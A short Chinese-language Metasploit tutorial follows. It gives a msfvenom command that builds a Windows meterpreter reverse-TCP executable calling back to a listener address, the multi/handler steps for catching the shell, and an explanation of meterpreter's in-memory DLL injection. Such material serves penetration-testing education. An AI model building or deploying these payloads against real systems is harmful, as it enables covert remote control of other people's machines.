通過MsfVenom生成被控端
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.159 lport=5555 -f exe -o /root/123.exe
藉助於被控端,我們可以在kali上遠控連接被控端設備。
1.打開Metasploit
2.使用handler作為主控端,use exploit/multi/handler
3.設置payload,lhost,lport參數
4.exploit執行主控端
在成功連接被控端設備之後,出現了我們本期教程的主角:meterpreter 。
meterpreter 是一個高級的,動態的,可拓展的Payload,出現meterpreter 我們就有了shell,可以執行非常多的命令,去操控遠端設備。
執行命令:?或者help,顯示出可以執行的全部命令。
利用這些命令,我們可以完成非常多的操作,後續教程中不斷給大家一一講解。
meterpreter是如何工作的
meterpreter 是完全基於內存的DLL注入式的payload。
meterpreter 先注入合法的系統進程並建立stager,基於stager建立加密的TLS/1.0通信隧道,利用TLS隧道進一步加載後續的拓展模塊,實現更高級的功能。